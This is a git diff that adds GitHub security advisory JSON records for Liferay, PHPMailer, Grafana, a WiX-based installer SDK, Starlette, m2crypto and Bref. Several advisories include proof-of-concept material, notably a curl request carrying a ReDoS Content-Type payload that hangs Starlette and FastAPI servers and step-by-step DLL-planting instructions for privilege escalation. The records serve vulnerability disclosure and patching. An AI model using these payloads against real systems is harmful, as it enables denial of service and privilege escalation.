b/advisories/github-reviewed/2024/02/GHSA-87m3-6qj3-p3xh/GHSA-87m3-6qj3-p3xh.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87m3-6qj3-p3xh", + "modified": "2024-02-07T19:32:22Z", + "published": "2024-02-07T15:30:50Z", + "aliases": [ + "CVE-2024-25143" + ], + "summary": "Liferay Portal denial of service (memory consumption)", + "details": "The Document and Media widget In Liferay Portal 7.2.0 through 7.3.6, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 13, and older unsupported versions, does not limit resource consumption when generating a preview image, which allows remote authenticated users to cause a denial of service (memory consumption) via crafted PNG images.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.portal.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.3.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25143" + }, + { + "type": "WEB", + "url": "https://github.com/liferay/liferay-portal/commit/29b73b9b896c7d44fb5d1800a402698c303d1cf6" + }, + { + "type": "WEB", + "url": "https://github.com/liferay/liferay-portal/commit/4381c10ad0722b3b00c3e3567b68538ab0994145" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + }, + { + "type": "WEB", + "url": "https://github.com/liferay/liferay-portal/releases/tag/7.3.7-ga8" + }, + { + "type": "WEB", + "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25143" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T19:32:22Z", + "nvd_published_at": "2024-02-07T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-8jc3-5p29-qgjx/GHSA-8jc3-5p29-qgjx.json b/advisories/github-reviewed/2024/02/GHSA-8jc3-5p29-qgjx/GHSA-8jc3-5p29-qgjx.json new file mode 100644 index 0000000000000..c315c0d36e61b --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-8jc3-5p29-qgjx/GHSA-8jc3-5p29-qgjx.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jc3-5p29-qgjx", + "modified": "2024-02-02T20:43:57Z", + "published": "2024-02-02T20:43:57Z", + "aliases": [ + "CVE-2006-5734" + ], + "summary": "PHPMailer Local file inclusion", + "details": "### Impact\nArbitrary local file inclusion via the `$lang` property, remotely exploitable if host application passes unfiltered user data into that property. The 3 CVEs listed are applications that used PHPMailer that were vulnerable to this problem.\n\n### Patches\nIt's not known exactly when this was fixed in the host applications, but it was fixed in PHPMailer 5.2.0.\n\n### Workarounds\nFilter and validate user-supplied data before use.\n\n### References\nhttps://nvd.nist.gov/vuln/detail/CVE-2006-5734\nhttps://nvd.nist.gov/vuln/detail/CVE-2007-3215\nhttps://nvd.nist.gov/vuln/detail/CVE-2007-2021\nExample exploit: https://www.exploit-db.com/exploits/14893\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "phpmailer/phpmailer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-8jc3-5p29-qgjx" + }, + { + "type": "PACKAGE", + "url": "https://github.com/PHPMailer/PHPMailer" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T20:43:57Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-8pjx-jj86-j47p/GHSA-8pjx-jj86-j47p.json b/advisories/github-reviewed/2024/02/GHSA-8pjx-jj86-j47p/GHSA-8pjx-jj86-j47p.json new file mode 100644 index 0000000000000..a70a562391942 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-8pjx-jj86-j47p/GHSA-8pjx-jj86-j47p.json @@ -0,0 +1,142 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8pjx-jj86-j47p", + "modified": "2024-02-01T00:16:10Z", + "published": "2024-02-01T00:16:10Z", + "aliases": [ + "CVE-2021-43798" + ], + "summary": "Grafana path traversal", + "details": "Today we are releasing Grafana 8.3.1, 8.2.7, 8.1.8, 8.0.7. This patch release includes a high severity security fix that affects Grafana versions from v8.0.0-beta1 through v8.3.0.\n\nRelease v8.3.1, only containing a security fix:\n\n- [Download Grafana 8.3.1](https://grafana.com/grafana/download/8.3.1)\n- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-3-1/)\n\nRelease v8.2.7, only containing a security fix:\n\n- [Download Grafana 8.2.7](https://grafana.com/grafana/download/8.2.7)\n- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-2-7/)\n\nRelease v8.1.8, only containing a security fix:\n\n- [Download Grafana 8.1.8](https://grafana.com/grafana/download/8.1.8)\n- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-8/)\n\nRelease v8.0.7, only containing a security fix:\n\n- [Download Grafana 8.0.7](https://grafana.com/grafana/download/8.0.7)\n- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-0-7/)\n\n\n## Path Traversal ([CVE-2021-43798](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43798))\n\n### Summary \n\nOn 2021-12-03, we received a report that Grafana is vulnerable to directory traversal, allowing access to local files. We have confirmed this for versions 8.0.0-beta1 to 8.3.0. Thanks to our defense-in-depth approach, at no time has [Grafana Cloud](https://grafana.com/cloud) been vulnerable.\n\nThe vulnerable URL path is: /public/plugins//, where is the plugin ID for any installed plugin.\n\nEvery Grafana instance comes with pre-installed plugins like the Prometheus plugin or MySQL plugin so the following URLs are vulnerable for every instance:\n\n* /public/plugins/alertlist/\n* /public/plugins/annolist/\n* /public/plugins/barchart/\n* /public/plugins/bargauge/\n* /public/plugins/candlestick/\n* /public/plugins/cloudwatch/\n* /public/plugins/dashlist/\n* /public/plugins/elasticsearch/\n* /public/plugins/gauge/\n* /public/plugins/geomap/\n* /public/plugins/gettingstarted/\n* /public/plugins/grafana-azure-monitor-datasource/\n* /public/plugins/graph/\n* /public/plugins/heatmap/\n* /public/plugins/histogram/\n* /public/plugins/influxdb/\n* /public/plugins/jaeger/\n* /public/plugins/logs/\n* /public/plugins/loki/\n* /public/plugins/mssql/\n* /public/plugins/mysql/\n* /public/plugins/news/\n* /public/plugins/nodeGraph/\n* /public/plugins/opentsdb\n* /public/plugins/piechart/\n* /public/plugins/pluginlist/\n* /public/plugins/postgres/\n* /public/plugins/prometheus/\n* /public/plugins/stackdriver/\n* /public/plugins/stat/\n* /public/plugins/state-timeline/\n* /public/plugins/status-history/\n* /public/plugins/table/\n* /public/plugins/table-old/\n* /public/plugins/tempo/\n* /public/plugins/testdata/\n* /public/plugins/text/\n* /public/plugins/timeseries/\n* /public/plugins/welcome/\n* /public/plugins/zipkin/\n\nWe have received CVE-2021-43798 for this issue. The CVSS score for this vulnerability is 7.5 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) for Grafana versions 8.0.0-beta1 to 8.3.0 \n\n### Affected versions with high severity \n\nGrafana 8.0.0-beta1 to 8.3.0\n\n### Solutions and mitigations\n\nAll installations between v8.0.0-beta1 and v8.3.0 should be upgraded as soon as possible.\n\nIf you can not upgrade, running a reverse proxy in front of Grafana that normalizes the PATH of the request will mitigate the vulnerability. For example the normalize_path setting in envoy.\n\nThanks to our defense-in-depth approach, [Grafana Cloud](https://grafana.com/cloud) instances have not been affected by the vulnerability.\n\nAs always, we closely coordinated with all cloud providers licensed to offer Grafana Pro. They have received early notification under embargo and confirmed that their offerings are secure at the time of this announcement. In alphabetical order, this is applicable to Amazon Managed Grafana, and Azure Managed Grafana.\n\n### Timeline and postmortem\n\nHere is a detailed timeline starting from when we originally learned of the issue. All times in UTC.\n\n* 2021-12-03: Security researcher sends the initial report\n* 2021-12-03: Confirmed for 8.0.0-beta1 through 8.3.0\n* 2021-12-03: Confirmed that Grafana Cloud is not vulnerable\n* 2021-12-03: Security fix determined and committed to Git\n* 2021-12-03: Release timeline determined: 2021-12-07 for private customer release, 2021-12-14 for public release\n* 2021-12-06: Second report about the vulnerability received\n* 2021-12-07: We received information that the vulnerability has been leaked to the public, turning it into a 0 day\n* 2021-12-07: Decision made to release as quickly as feasible\n* 2021-12-07: Private release with reduced two hour grace period instead of the usual 1 week\n* 2021-12-07: Public release\n\n### Acknowledgements\n\nWe would like to thank [Jordy Versmissen](https://twitter.com/j0v0x0) for finding the vulnerability and alerting us to it.\n\n## Reporting security Issues\n\nIf you think you have found a security vulnerability, please send a report to [security@grafana.com](mailto:security@grafana.com). This address can be used for all of\nGrafana Labs' open source and commercial products (including but not limited to Grafana, Grafana Cloud, Grafana Enterprise, and grafana.com). We can accept only vulnerability reports at this address. We would prefer that you encrypt your message to us by using our PGP key. The key fingerprint is\n\nF988 7BEA 027A 049F AE8E 5CAA D125 8932 BE24 C5CA\n\nThe key is available from [keyserver.ubuntu.com](https://keyserver.ubuntu.com/pks/lookup?search=0xF9887BEA027A049FAE8E5CAAD1258932BE24C5CA&fingerprint=on&op=index).\n\n## Security announcements\n\nWe maintain a [security category on our blog](https://grafana.com/tags/security/), where we will always post a summary, remediation, and mitigation details for any patch containing security fixes. \n\nYou can also subscribe to our [RSS feed](https://grafana.com/tags/security/index.xml).\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.3.0" + }, + { + "fixed": "8.3.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.2.0" + }, + { + "fixed": "8.2.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.1.0" + }, + { + "fixed": "8.1.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0-beta1" + }, + { + "fixed": "8.0.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43798" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/c798c0e958d15d9cc7f27c72113d572fa58545ce" + }, + { + "type": "WEB", + "url": "https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20211229-0004/" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.html" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/165221/Grafana-8.3.0-Directory-Traversal-Arbitrary-File-Read.html" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2021/12/09/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2021/12/10/4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T00:16:10Z", + "nvd_published_at": "2021-12-07T19:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-8v28-3g86-chj5/GHSA-8v28-3g86-chj5.json b/advisories/github-reviewed/2024/02/GHSA-8v28-3g86-chj5/GHSA-8v28-3g86-chj5.json new file mode 100644 index 0000000000000..8703d027055e8 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-8v28-3g86-chj5/GHSA-8v28-3g86-chj5.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8v28-3g86-chj5", + "modified": "2024-02-08T18:24:35Z", + "published": "2024-02-08T18:24:35Z", + "aliases": [ + + ], + "summary": "PanelSwWix4.Sdk .be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges", + "details": "# Summary\n\n.be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges.\n\n# Details\n\nIf the bundle is not run as admin, the user's TEMP folder is used and not the system TEMP folder. A utility is able to monitor the user's TEMP folder for changes and drop its own DLL into the .be/.Local folder immediately when the .be folder is created. When the burn engine elevates, the malicious DLL receives elevated privileges.\n\n# PoC\n\nAs a standard, non-admin user:\n\n1. Monitor the user's TEMP folder for changes using ReadDirectoryChangesW\n1. On FILE_ACTION_ADDED, check if the folder name is .be\n1. Create a folder in .be named after the bundle + .Local (e.g. MyInstaller.exe.Local)\n1. Put the malicious COMCTL32.DLL in the .Local folder following the naming used for the real DLL (e.g. MyInstaller.exe.Local/x86_microsoft.windows.common-controls_.../COMCTL32.dll)\n1. Do hacker things when the engine escalates and the malicious DLL is loaded\n\nProper naming for the path can be obtained by using GetModuleHandle(\"comctl32.dll\") and GetModuleFileName.\n\n# Impact\n\nDLL redirection utilizing .exe.Local Windows capability. This impacts any installer built with the WiX installer framework.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "PanelSwWix4.Sdk" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.0.0-psw-wix.0251-40" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nirbar/wix4/security/advisories/GHSA-8v28-3g86-chj5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/nirbar/wix4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-426" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:24:35Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json b/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json new file mode 100644 index 0000000000000..75f0f722cf2c1 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-93gm-qmq6-w238", + "modified": "2024-02-05T17:01:19Z", + "published": "2024-02-05T17:01:19Z", + "aliases": [ + + ], + "summary": "Starlette Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a Starlette app that uses form data. To reproduce it it's not even necessary to create a Starlette app, just using the `Request` is enough:\n\n```Python\n# main.py\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\n\n\nasync def app(scope, receive, send):\n assert scope[\"type\"] == \"http\"\n request = Request(scope, receive)\n data = await request.form()\n response_data = {}\n for key in data:\n print(key, data.getlist(key))\n response_data[key] = data.getlist(key)\n response = JSONResponse(response_data)\n await response(scope, receive, send)\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "starlette" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.36.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.36.1" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238" + }, + { + "type": "WEB", + "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5" + }, + { + "type": "WEB", + "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74" + }, + { + "type": "PACKAGE", + "url": "https://github.com/encode/starlette" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:01:19Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-944j-8ch6-rf6x/GHSA-944j-8ch6-rf6x.json b/advisories/github-reviewed/2024/02/GHSA-944j-8ch6-rf6x/GHSA-944j-8ch6-rf6x.json new file mode 100644 index 0000000000000..2cedc2ef6f8d5 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-944j-8ch6-rf6x/GHSA-944j-8ch6-rf6x.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-944j-8ch6-rf6x", + "modified": "2024-02-05T22:41:57Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2023-50781" + ], + "summary": "m2crypto Bleichenbacher timing attack - incomplete fix for CVE-2020-25657", + "details": "A flaw was found in m2crypto. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "m2crypto" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.40.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50781" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-50781" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254426" + }, + { + "type": "PACKAGE", + "url": "https://gitlab.com/m2crypto/m2crypto" + }, + { + "type": "WEB", + "url": "https://gitlab.com/m2crypto/m2crypto/-/issues/342" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T22:41:57Z", + "nvd_published_at": "2024-02-05T21:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-99f9-gv72-fw9r/GHSA-99f9-gv72-fw9r.json b/advisories/github-reviewed/2024/02/GHSA-99f9-gv72-fw9r/GHSA-99f9-gv72-fw9r.json new file mode 100644 index 0000000000000..5e687a753d837 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-99f9-gv72-fw9r/GHSA-99f9-gv72-fw9r.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-99f9-gv72-fw9r", + "modified": "2024-02-01T20:53:08Z", + "published": "2024-02-01T20:53:08Z", + "aliases": [ + "CVE-2024-24753" + ], + "summary": "Bref Doesn't Support Multiple Value Headers in ApiGatewayFormatV2", + "details": "## Impacted Resources\n\nbref/src/Event/Http/HttpResponse.php:61-90\n\n## Description\n\nWhen Bref is used in combination with an API Gateway with the v2 format, it does not handle multiple values headers.\n\nPrecisely, if PHP generates a response with two headers having the same key but different values only the latest one is kept.\n\n## Impact\n\nIf an application relies on multiple headers with the same key being set for security reasons, then Bref would lower the application security.\n\nFor example, if an application sets multiple `Content-Security-Policy` headers, then Bref would just reflect the latest one.\n\n## PoC\n\n1. Create a new Bref project.\n2. Create an `index.php` file with the following content:\n```php\n\n\n\n```\n3. Use the following `serverless.yml` to deploy the Lambda:\n```yaml\nservice: app\n\nprovider:\n name: aws\n region: eu-central-1\n\nplugins:\n - ./vendor/bref/bref\n\nfunctions:\n api:\n handler: index.php\n description: ''\n runtime: php-81-fpm\n timeout: 28 # in seconds (API Gateway has a timeout of 29 seconds)\n events:\n - httpApi: '*'\n\n# Exclude files from deployment\npackage:\n patterns:\n - '!node_modules/**'\n - '!tests/**'\n```\n4. Browse the Lambda URL.\n5. Notice that the JavaScript code is executed as the `Content-Security-Policy: script-src 'none'` header has been removed.\n6. Notice that the external image has not been loaded as the `Content-Security-Policy: img-src 'self'` header has been kept.\n7. Start a PHP server inside the project directory (e.g. `php -S 127.0.0.1:8090`).\n8. Browse the `index.php` script through the PHP server (e.g. http://127.0.0.1:8090/index.php).\n9. Notice that the JavaScript code is not executed as the `Content-Security-Policy: script-src 'none'` header has been kept.\n10. Notice that the external image has not been loaded as the `Content-Security-Policy: img-src 'self'` header has been kept.\n\n## Suggested Remediation\n\nConcatenate all the multiple value headers' values with a comma (`,`) as separator and return a single header with all the values to the API Gateway.\n\n## References\n\n- https://www.rfc-editor.org/rfc/rfc9110.html#section-5.2", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "bref/bref" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.1.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/security/advisories/GHSA-99f9-gv72-fw9r" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24753" + }, + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/commit/f834027aaf88b3885f4aa8edf6944ae920daf2dc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/brefphp/bref" + }, + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/blob/2.1.12/src/Event/Http/HttpResponse.php#L61-L90" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-436" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:53:08Z", + "nvd_published_at": "2024-02-01T16:17:14Z" + } +} \ No newline at end of file diff --git 